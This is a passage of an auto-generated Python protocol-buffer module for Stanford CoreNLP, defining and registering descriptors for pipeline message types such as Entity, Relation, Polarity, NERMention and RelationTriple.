name='mentionType', full_name='edu.stanford.nlp.pipeline.Entity.mentionType', index=2,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='normalizedName', full_name='edu.stanford.nlp.pipeline.Entity.normalizedName', index=3,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headTokenIndex', full_name='edu.stanford.nlp.pipeline.Entity.headTokenIndex', index=4,
number=10, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='corefID', full_name='edu.stanford.nlp.pipeline.Entity.corefID', index=5,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='objectID', full_name='edu.stanford.nlp.pipeline.Entity.objectID', index=6,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='extentStart', full_name='edu.stanford.nlp.pipeline.Entity.extentStart', index=7,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='extentEnd', full_name='edu.stanford.nlp.pipeline.Entity.extentEnd', index=8,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='edu.stanford.nlp.pipeline.Entity.type', index=9,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subtype', full_name='edu.stanford.nlp.pipeline.Entity.subtype', index=10,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5486,
serialized_end=5705,
)
_RELATION = _descriptor.Descriptor(
name='Relation',
full_name='edu.stanford.nlp.pipeline.Relation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='argName', full_name='edu.stanford.nlp.pipeline.Relation.argName', index=0,
number=6, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='arg', full_name='edu.stanford.nlp.pipeline.Relation.arg', index=1,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='signature', full_name='edu.stanford.nlp.pipeline.Relation.signature', index=2,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='objectID', full_name='edu.stanford.nlp.pipeline.Relation.objectID', index=3,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='extentStart', full_name='edu.stanford.nlp.pipeline.Relation.extentStart', index=4,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='extentEnd', full_name='edu.stanford.nlp.pipeline.Relation.extentEnd', index=5,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='edu.stanford.nlp.pipeline.Relation.type', index=6,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subtype', full_name='edu.stanford.nlp.pipeline.Relation.subtype', index=7,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5708,
serialized_end=5891,
)
_OPERATOR = _descriptor.Descriptor(
name='Operator',
full_name='edu.stanford.nlp.pipeline.Operator',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='edu.stanford.nlp.pipeline.Operator.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='quantifierSpanBegin', full_name='edu.stanford.nlp.pipeline.Operator.quantifierSpanBegin', index=1,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='quantifierSpanEnd', full_name='edu.stanford.nlp.pipeline.Operator.quantifierSpanEnd', index=2,
number=3, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subjectSpanBegin', full_name='edu.stanford.nlp.pipeline.Operator.subjectSpanBegin', index=3,
number=4, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subjectSpanEnd', full_name='edu.stanford.nlp.pipeline.Operator.subjectSpanEnd', index=4,
number=5, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='objectSpanBegin', full_name='edu.stanford.nlp.pipeline.Operator.objectSpanBegin', index=5,
number=6, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='objectSpanEnd', full_name='edu.stanford.nlp.pipeline.Operator.objectSpanEnd', index=6,
number=7, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5894,
serialized_end=6072,
)
_POLARITY = _descriptor.Descriptor(
name='Polarity',
full_name='edu.stanford.nlp.pipeline.Polarity',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='projectEquivalence', full_name='edu.stanford.nlp.pipeline.Polarity.projectEquivalence', index=0,
number=1, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectForwardEntailment', full_name='edu.stanford.nlp.pipeline.Polarity.projectForwardEntailment', index=1,
number=2, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectReverseEntailment', full_name='edu.stanford.nlp.pipeline.Polarity.projectReverseEntailment', index=2,
number=3, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectNegation', full_name='edu.stanford.nlp.pipeline.Polarity.projectNegation', index=3,
number=4, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectAlternation', full_name='edu.stanford.nlp.pipeline.Polarity.projectAlternation', index=4,
number=5, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectCover', full_name='edu.stanford.nlp.pipeline.Polarity.projectCover', index=5,
number=6, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectIndependence', full_name='edu.stanford.nlp.pipeline.Polarity.projectIndependence', index=6,
number=7, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=6075,
serialized_end=6628,
)
_NERMENTION = _descriptor.Descriptor(
name='NERMention',
full_name='edu.stanford.nlp.pipeline.NERMention',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='sentenceIndex', full_name='edu.stanford.nlp.pipeline.NERMention.sentenceIndex', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenStartInSentenceInclusive', full_name='edu.stanford.nlp.pipeline.NERMention.tokenStartInSentenceInclusive', index=1,
number=2, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenEndInSentenceExclusive', full_name='edu.stanford.nlp.pipeline.NERMention.tokenEndInSentenceExclusive', index=2,
number=3, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ner', full_name='edu.stanford.nlp.pipeline.NERMention.ner', index=3,
number=4, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='normalizedNER', full_name='edu.stanford.nlp.pipeline.NERMention.normalizedNER', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entityType', full_name='edu.stanford.nlp.pipeline.NERMention.entityType', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timex', full_name='edu.stanford.nlp.pipeline.NERMention.timex', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='wikipediaEntity', full_name='edu.stanford.nlp.pipeline.NERMention.wikipediaEntity', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=6631,
serialized_end=6872,
)
_SENTENCEFRAGMENT = _descriptor.Descriptor(
name='SentenceFragment',
full_name='edu.stanford.nlp.pipeline.SentenceFragment',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='tokenIndex', full_name='edu.stanford.nlp.pipeline.SentenceFragment.tokenIndex', index=0,
number=1, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='root', full_name='edu.stanford.nlp.pipeline.SentenceFragment.root', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assumedTruth', full_name='edu.stanford.nlp.pipeline.SentenceFragment.assumedTruth', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='score', full_name='edu.stanford.nlp.pipeline.SentenceFragment.score', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=6874,
serialized_end=6963,
)
_RELATIONTRIPLE = _descriptor.Descriptor(
name='RelationTriple',
full_name='edu.stanford.nlp.pipeline.RelationTriple',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='subject', full_name='edu.stanford.nlp.pipeline.RelationTriple.subject', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='relation', full_name='edu.stanford.nlp.pipeline.RelationTriple.relation', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='object', full_name='edu.stanford.nlp.pipeline.RelationTriple.object', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='confidence', full_name='edu.stanford.nlp.pipeline.RelationTriple.confidence', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subjectTokens', full_name='edu.stanford.nlp.pipeline.RelationTriple.subjectTokens', index=4,
number=5, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='relationTokens', full_name='edu.stanford.nlp.pipeline.RelationTriple.relationTokens', index=5,
number=6, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='objectTokens', full_name='edu.stanford.nlp.pipeline.RelationTriple.objectTokens', index=6,
number=7, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tree', full_name='edu.stanford.nlp.pipeline.RelationTriple.tree', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='istmod', full_name='edu.stanford.nlp.pipeline.RelationTriple.istmod', index=8,
number=9, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='prefixBe', full_name='edu.stanford.nlp.pipeline.RelationTriple.prefixBe', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='suffixBe', full_name='edu.stanford.nlp.pipeline.RelationTriple.suffixBe', index=10,
number=11, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='suffixOf', full_name='edu.stanford.nlp.pipeline.RelationTriple.suffixOf', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=6966,
serialized_end=7250,
)
_MAPSTRINGSTRING = _descriptor.Descriptor(
name='MapStringString',
full_name='edu.stanford.nlp.pipeline.MapStringString',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='edu.stanford.nlp.pipeline.MapStringString.key', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='edu.stanford.nlp.pipeline.MapStringString.value', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=7252,
serialized_end=7297,
)
_MAPINTSTRING = _descriptor.Descriptor(
name='MapIntString',
full_name='edu.stanford.nlp.pipeline.MapIntString',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='edu.stanford.nlp.pipeline.MapIntString.key', index=0,
number=1, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='edu.stanford.nlp.pipeline.MapIntString.value', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=7299,
serialized_end=7341,
)
_DOCUMENT.fields_by_name['sentence'].message_type = _SENTENCE
_DOCUMENT.fields_by_name['corefChain'].message_type = _COREFCHAIN
_DOCUMENT.fields_by_name['sentencelessToken'].message_type = _TOKEN
_DOCUMENT.fields_by_name['quote'].message_type = _QUOTE
_DOCUMENT.fields_by_name['mentions'].message_type = _NERMENTION
_SENTENCE.fields_by_name['token'].message_type = _TOKEN
_SENTENCE.fields_by_name['parseTree'].message_type = _PARSETREE
_SENTENCE.fields_by_name['binarizedParseTree'].message_type = _PARSETREE
_SENTENCE.fields_by_name['annotatedParseTree'].message_type = _PARSETREE
_SENTENCE.fields_by_name['kBestParseTrees'].message_type = _PARSETREE
_SENTENCE.fields_by_name['basicDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['collapsedDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['collapsedCCProcessedDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['alternativeDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['openieTriple'].message_type = _RELATIONTRIPLE
_SENTENCE.fields_by_name['kbpTriple'].message_type = _RELATIONTRIPLE
_SENTENCE.fields_by_name['entailedSentence'].message_type = _SENTENCEFRAGMENT
_SENTENCE.fields_by_name['enhancedDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['enhancedPlusPlusDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['entity'].message_type = _ENTITY
_SENTENCE.fields_by_name['relation'].message_type = _RELATION
_SENTENCE.fields_by_name['mentions'].message_type = _NERMENTION
_SENTENCE.fields_by_name['mentionsForCoref'].message_type = _MENTION
_TOKEN.fields_by_name['timexValue'].message_type = _TIMEX
_TOKEN.fields_by_name['operator'].message_type = _OPERATOR
_TOKEN.fields_by_name['polarity'].message_type = _POLARITY
_TOKEN.fields_by_name['span'].message_type = _SPAN
_TOKEN.fields_by_name['conllUFeatures'].message_type = _MAPSTRINGSTRING
_TOKEN.fields_by_name['conllUTokenSpan'].message_type = _SPAN
_TOKEN.fields_by_name['conllUSecondaryDeps'].message_type = _MAPINTSTRING
_PARSETREE.fields_by_name['child'].message_type = _PARSETREE
_PARSETREE.fields_by_name['sentiment'].enum_type = _SENTIMENT
_DEPENDENCYGRAPH_NODE.containing_type = _DEPENDENCYGRAPH
_DEPENDENCYGRAPH_EDGE.fields_by_name['language'].enum_type = _LANGUAGE
_DEPENDENCYGRAPH_EDGE.containing_type = _DEPENDENCYGRAPH
_DEPENDENCYGRAPH.fields_by_name['node'].message_type = _DEPENDENCYGRAPH_NODE
_DEPENDENCYGRAPH.fields_by_name['edge'].message_type = _DEPENDENCYGRAPH_EDGE
_COREFCHAIN_COREFMENTION.containing_type = _COREFCHAIN
_COREFCHAIN.fields_by_name['mention'].message_type = _COREFCHAIN_COREFMENTION
_MENTION.fields_by_name['headIndexedWord'].message_type = _INDEXEDWORD
_MENTION.fields_by_name['dependingVerb'].message_type = _INDEXEDWORD
_MENTION.fields_by_name['headWord'].message_type = _INDEXEDWORD
_MENTION.fields_by_name['speakerInfo'].message_type = _SPEAKERINFO
_MENTION.fields_by_name['sentenceWords'].message_type = _INDEXEDWORD
_MENTION.fields_by_name['originalSpan'].message_type = _INDEXEDWORD
_RELATION.fields_by_name['arg'].message_type = _ENTITY
_POLARITY.fields_by_name['projectEquivalence'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectForwardEntailment'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectReverseEntailment'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectNegation'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectAlternation'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectCover'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectIndependence'].enum_type = _NATURALLOGICRELATION
_NERMENTION.fields_by_name['timex'].message_type = _TIMEX
_RELATIONTRIPLE.fields_by_name['tree'].message_type = _DEPENDENCYGRAPH
DESCRIPTOR.message_types_by_name['Document'] = _DOCUMENT
DESCRIPTOR.message_types_by_name['Sentence'] = _SENTENCE
DESCRIPTOR.message_types_by_name['Token'] = _TOKEN
DESCRIPTOR.message_types_by_name['Quote'] = _QUOTE
DESCRIPTOR.message_types_by_name['ParseTree'] = _PARSETREE
DESCRIPTOR.message_types_by_name['DependencyGraph'] = _DEPENDENCYGRAPH
DESCRIPTOR.message_types_by_name['CorefChain'] = _COREFCHAIN
DESCRIPTOR.message_types_by_name['Mention'] = _MENTION
DESCRIPTOR.message_types_by_name['IndexedWord'] = _INDEXEDWORD
DESCRIPTOR.message_types_by_name['SpeakerInfo'] = _SPEAKERINFO
DESCRIPTOR.message_types_by_name['Span'] = _SPAN
DESCRIPTOR.message_types_by_name['Timex'] = _TIMEX
DESCRIPTOR.message_types_by_name['Entity'] = _ENTITY
DESCRIPTOR.message_types_by_name['Relation'] = _RELATION
DESCRIPTOR.message_types_by_name['Operator'] = _OPERATOR
DESCRIPTOR.message_types_by_name['Polarity'] = _POLARITY
DESCRIPTOR.message_types_by_name['NERMention'] = _NERMENTION
DESCRIPTOR.message_types_by_name['SentenceFragment'] = _SENTENCEFRAGMENT
DESCRIPTOR.message_types_by_name['RelationTriple'] = _RELATIONTRIPLE
DESCRIPTOR.message_types_by_name['MapStringString'] = _MAPSTRINGSTRING
DESCRIPTOR.message_types_by_name['MapIntString'] = _MAPINTSTRING
DESCRIPTOR.enum_types_by_name['Language'] = _LANGUAGE
DESCRIPTOR.enum_types_by_name['Sentiment'] = _SENTIMENT
DESCRIPTOR.enum_types_by_name['NaturalLogicRelation'] = _NATURALLOGICRELATION
Document = _reflection.GeneratedProtocolMessageType('Document', (_message.Message,), dict(
DESCRIPTOR = _DOCUMENT,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Document)
))
_sym_db.RegisterMessage(Document)
Sentence = _reflection.GeneratedProtocolMessageType('Sentence', (_message.Message,), dict(
DESCRIPTOR = _SENTENCE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Sentence)
))
_sym_db.RegisterMessage(Sentence)
Token = _reflection.GeneratedProtocolMessageType('Token', (_message.Message,), dict(
DESCRIPTOR = _TOKEN,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Token)
))
_sym_db.RegisterMessage(Token)
Quote = _reflection.GeneratedProtocolMessageType('Quote', (_message.Message,), dict(
DESCRIPTOR = _QUOTE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Quote)
))
_sym_db.RegisterMessage(Quote)
ParseTree = _reflection.GeneratedProtocolMessageType('ParseTree', (_message.Message,), dict(
DESCRIPTOR = _PARSETREE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.ParseTree)
))
_sym_db.RegisterMessage(ParseTree)
DependencyGraph = _reflection.GeneratedProtocolMessageType('DependencyGraph', (_message.Message,), dict(
Node = _reflection.GeneratedProtocolMessageType('Node', (_message.Message,), dict(
DESCRIPTOR = _DEPENDENCYGRAPH_NODE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.DependencyGraph.Node)
))
,
Edge = _reflection.GeneratedProtocolMessageType('Edge', (_message.Message,), dict(
DESCRIPTOR = _DEPENDENCYGRAPH_EDGE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.DependencyGraph.Edge)
))
,
DESCRIPTOR = _DEPENDENCYGRAPH,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.DependencyGraph)
))
_sym_db.RegisterMessage(DependencyGraph)
_sym_db.RegisterMessage(DependencyGraph.Node)
_sym_db.RegisterMessage(DependencyGraph.Edge)
CorefChain = _reflection.GeneratedProtocolMessageType('CorefChain', (_message.Message,), dict(
CorefMention = _reflection.GeneratedProtocolMessageType('CorefMention', (_message.Message,), dict(
DESCRIPTOR = _COREFCHAIN_COREFMENTION,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.CorefChain.CorefMention)
))
,
DESCRIPTOR = _COREFCHAIN,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.CorefChain)
))
_sym_db.RegisterMessage(CorefChain)
_sym_db.RegisterMessage(CorefChain.CorefMention)
Mention = _reflection.GeneratedProtocolMessageType('Mention', (_message.Message,), dict(
DESCRIPTOR = _MENTION,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Mention)
))
_sym_db.RegisterMessage(Mention)
IndexedWord = _reflection.GeneratedProtocolMessageType('IndexedWord', (_message.Message,), dict(
DESCRIPTOR = _INDEXEDWORD,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.IndexedWord)
))
_sym_db.RegisterMessage(IndexedWord)
SpeakerInfo = _reflection.GeneratedProtocolMessageType('SpeakerInfo', (_message.Message,), dict(
DESCRIPTOR = _SPEAKERINFO,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.SpeakerInfo)
))
_sym_db.RegisterMessage(SpeakerInfo)
Span = _reflection.GeneratedProtocolMessageType('Span', (_message.Message,), dict(
DESCRIPTOR = _SPAN,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Span)
))
_sym_db.RegisterMessage(Span)
Timex = _reflection.GeneratedProtocolMessageType('Timex', (_message.Message,), dict(
DESCRIPTOR = _TIMEX,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Timex)
))
_sym_db.RegisterMessage(Timex)
Entity = _reflection.GeneratedProtocolMessageType('Entity', (_message.Message,), dict(
DESCRIPTOR = _ENTITY,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Entity)
))
